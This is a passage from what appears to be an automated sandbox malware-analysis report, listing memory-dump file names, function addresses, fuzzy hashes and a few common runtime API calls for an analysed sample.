Associated: 00000000.00000002.1309685927.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309715324.0000000001066000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309766440.000000000106F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309808864.0000000001070000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309837022.0000000001073000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309889193.000000000107B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309915807.000000000107D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309942146.000000000107E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309991612.0000000001081000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310046973.000000000108A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310079916.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310108778.0000000001093000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310143480.000000000109B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310181905.00000000010BC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310214491.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310214491.00000000010DC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310275195.00000000010F3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310301954.00000000010F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310337826.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310364953.000000000110E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310400501.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310432172.0000000001114000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310466177.0000000001123000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310498687.0000000001124000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e556f282ae1801f2bebdf461bb0b5370dbfcef126af1d800fee8555281b016aa
Instruction ID: 4e51be5d1ed4454087764c97502a6485e57dcd65ed576ba5de3a23c69c3ef435
Opcode Fuzzy Hash: e556f282ae1801f2bebdf461bb0b5370dbfcef126af1d800fee8555281b016aa
Instruction Fuzzy Hash: A081DDB0A002458FEB15CF6999907AEBBF1EB59300F1412A9DA50A73D2C3319989CBA0

Function 00E478BB Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1308657171.0000000000E01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.1308629296.0000000000E00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1308657171.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1308787151.0000000000E69000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1308834246.0000000000E6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1308934215.0000000000E77000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309097929.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309127459.0000000000FDA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309178812.0000000000FEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309178812.0000000000FFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309239679.0000000001003000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309299951.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309337659.0000000001010000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309363242.0000000001017000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309462623.000000000102F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309511031.0000000001031000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309544664.0000000001038000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309580524.0000000001043000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309648463.000000000105C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309685927.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309715324.0000000001066000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309766440.000000000106F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309808864.0000000001070000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309837022.0000000001073000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309889193.000000000107B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309915807.000000000107D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309942146.000000000107E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309991612.0000000001081000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310046973.000000000108A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310079916.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310108778.0000000001093000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310143480.000000000109B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310181905.00000000010BC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310214491.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310214491.00000000010DC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310275195.00000000010F3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310301954.00000000010F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310337826.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310364953.000000000110E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310400501.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310432172.0000000001114000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310466177.0000000001123000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310498687.0000000001124000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a36b7145921075ed386291a9134e99a4d08f32ccb62aa9eedf76cbde39d1b8d7
Instruction ID: 8fecd756d216b37bea3474f5b276975b04592f8d6236c03d5c3ac7ced799802b
Opcode Fuzzy Hash: a36b7145921075ed386291a9134e99a4d08f32ccb62aa9eedf76cbde39d1b8d7
Instruction Fuzzy Hash: AF21B673F204394B770CC47E8C5227DB6E1C78C541745423AE8A6EA2C1D968D917E2E4

Function 00E4779B Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1308657171.0000000000E01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.1308629296.0000000000E00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1308657171.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1308787151.0000000000E69000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1308834246.0000000000E6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1308934215.0000000000E77000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309097929.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309127459.0000000000FDA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309178812.0000000000FEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309178812.0000000000FFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309239679.0000000001003000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309299951.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309337659.0000000001010000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309363242.0000000001017000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309462623.000000000102F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309511031.0000000001031000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309544664.0000000001038000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309580524.0000000001043000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309648463.000000000105C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309685927.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309715324.0000000001066000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309766440.000000000106F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309808864.0000000001070000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309837022.0000000001073000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309889193.000000000107B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309915807.000000000107D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309942146.000000000107E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309991612.0000000001081000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310046973.000000000108A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310079916.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310108778.0000000001093000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310143480.000000000109B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310181905.00000000010BC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310214491.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310214491.00000000010DC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310275195.00000000010F3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310301954.00000000010F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310337826.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310364953.000000000110E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310400501.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310432172.0000000001114000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310466177.0000000001123000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310498687.0000000001124000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0051274e1766be535ceb2e2ae9e72bb111ee2a7fb03a59ce5b2b5dec3e4ec230
Instruction ID: db1a4b0bda744a66a5e45c18e9c15ab607d9b4c7b9df4b0c83fe0514457e282c
Opcode Fuzzy Hash: 0051274e1766be535ceb2e2ae9e72bb111ee2a7fb03a59ce5b2b5dec3e4ec230
Instruction Fuzzy Hash: DA11C633F30C255B675C81AD8C172BAA5D2EBD824070F533AD826F7284E9A4DE23D290

Function 00E48860 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1308657171.0000000000E01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.1308629296.0000000000E00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1308657171.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1308787151.0000000000E69000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1308834246.0000000000E6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1308934215.0000000000E77000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309097929.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309127459.0000000000FDA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309178812.0000000000FEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309178812.0000000000FFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309239679.0000000001003000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309299951.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309337659.0000000001010000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309363242.0000000001017000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309462623.000000000102F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309511031.0000000001031000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309544664.0000000001038000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309580524.0000000001043000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309648463.000000000105C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309685927.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309715324.0000000001066000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309766440.000000000106F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309808864.0000000001070000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309837022.0000000001073000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309889193.000000000107B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309915807.000000000107D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309942146.000000000107E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309991612.0000000001081000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310046973.000000000108A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310079916.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310108778.0000000001093000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310143480.000000000109B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310181905.00000000010BC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310214491.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310214491.00000000010DC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310275195.00000000010F3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310301954.00000000010F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310337826.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310364953.000000000110E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310400501.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310432172.0000000001114000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310466177.0000000001123000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310498687.0000000001124000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69368e33383e1e94eef2ceab35efabe13634146fb6e6488aa9fcdc9ed388e530
Instruction ID: 40668b9176c0b6c294af72e8bb1bd559961d22aff1ba99e7cdfa65573eeef0c9
Opcode Fuzzy Hash: 69368e33383e1e94eef2ceab35efabe13634146fb6e6488aa9fcdc9ed388e530
Instruction Fuzzy Hash: E8112B7720018243E60C8A2DFAB45BFA795EBCD329FEC637AD1417BB58DA22D9459600

Function 00E3A302 Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1308657171.0000000000E01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.1308629296.0000000000E00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1308657171.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1308787151.0000000000E69000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1308834246.0000000000E6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1308934215.0000000000E77000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309097929.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309127459.0000000000FDA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309178812.0000000000FEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309178812.0000000000FFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309239679.0000000001003000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309299951.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309337659.0000000001010000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309363242.0000000001017000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309462623.000000000102F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309511031.0000000001031000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309544664.0000000001038000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309580524.0000000001043000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309648463.000000000105C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309685927.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309715324.0000000001066000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309766440.000000000106F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309808864.0000000001070000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309837022.0000000001073000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309889193.000000000107B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309915807.000000000107D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309942146.000000000107E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309991612.0000000001081000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310046973.000000000108A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310079916.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310108778.0000000001093000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310143480.000000000109B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310181905.00000000010BC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310214491.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310214491.00000000010DC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310275195.00000000010F3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310301954.00000000010F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310337826.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310364953.000000000110E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310400501.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310432172.0000000001114000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310466177.0000000001123000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310498687.0000000001124000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8bfb7b8e78c370f2913f61a25c6defe040cdd2114a4e27868ad6e7523cb31ccb
Instruction ID: 97f429e486c91ce692592ab3e34eb040b8b99440029d209d9e60309d35c89c9b
Opcode Fuzzy Hash: 8bfb7b8e78c370f2913f61a25c6defe040cdd2114a4e27868ad6e7523cb31ccb
Instruction Fuzzy Hash: 97E08C72921228EBCB14DB98C90898EFBECEB49B00F6910A6F501E3150C270DE40C7D0

Function 00E02EC0 Relevance: 10.8, APIs: 7, Instructions: 272threadCOMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 00E02F5F
GetCurrentThreadId.KERNEL32 ref: 00E02F7E
__Mtx_unlock.LIBCPMT ref: 00E02FCC
__Cnd_broadcast.LIBCPMT ref: 00E02FE3
__Mtx_unlock.LIBCPMT ref: 00E030F5
GetCurrentThreadId.KERNEL32 ref: 00E03132
__Mtx_unlock.LIBCPMT ref: 00E0319B

Memory Dump Source

Source File: 00000000.00000002.1308657171.0000000000E01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.1308629296.0000000000E00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1308657171.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1308787151.0000000000E69000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1308834246.0000000000E6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1308934215.0000000000E77000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309097929.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309127459.0000000000FDA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309178812.0000000000FEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309178812.0000000000FFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309239679.0000000001003000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309299951.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309337659.0000000001010000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309363242.0000000001017000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309462623.000000000102F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309511031.0000000001031000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309544664.0000000001038000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309580524.0000000001043000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309648463.000000000105C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309685927.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309715324.0000000001066000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309766440.000000000106F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309808864.0000000001070000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309837022.0000000001073000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309889193.000000000107B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309915807.000000000107D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309942146.000000000107E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309991612.0000000001081000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310046973.000000000108A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310079916.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310108778.0000000001093000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310143480.000000000109B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310181905.00000000010BC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310214491.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310214491.00000000010DC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310275195.00000000010F3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310301954.00000000010F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310337826.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310364953.000000000110E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310400501.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310432172.0000000001114000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310466177.0000000001123000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310498687.0000000001124000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_file.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$CurrentThread$Cnd_broadcast
String ID:
API String ID: 57040152-0
Opcode ID: de4fa2b5d8d78c5cf30f9546ef06f3ab21ef0a74bc064d50d37667d096392777
Instruction ID: 539d0a8305e7327a3c56ddbe1bf649e48a9bda891f5d2a729126910785cca73d
Opcode Fuzzy Hash: de4fa2b5d8d78c5cf30f9546ef06f3ab21ef0a74bc064d50d37667d096392777
Instruction Fuzzy Hash: 22A10370A02615DFDB20DFB5C94579AB7E8FF19318F109129E815F7281EB31EA84CB91

Function 00E3CBDF Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00E3CC66

Strings

v, xrefs: 00E3CBE1

Memory Dump Source

Source File: 00000000.00000002.1308657171.0000000000E01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.1308629296.0000000000E00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1308657171.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1308787151.0000000000E69000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1308834246.0000000000E6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1308934215.0000000000E77000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309097929.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309127459.0000000000FDA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309178812.0000000000FEF000.00000040.00000001.01000000.00000003.sdmpDownload File
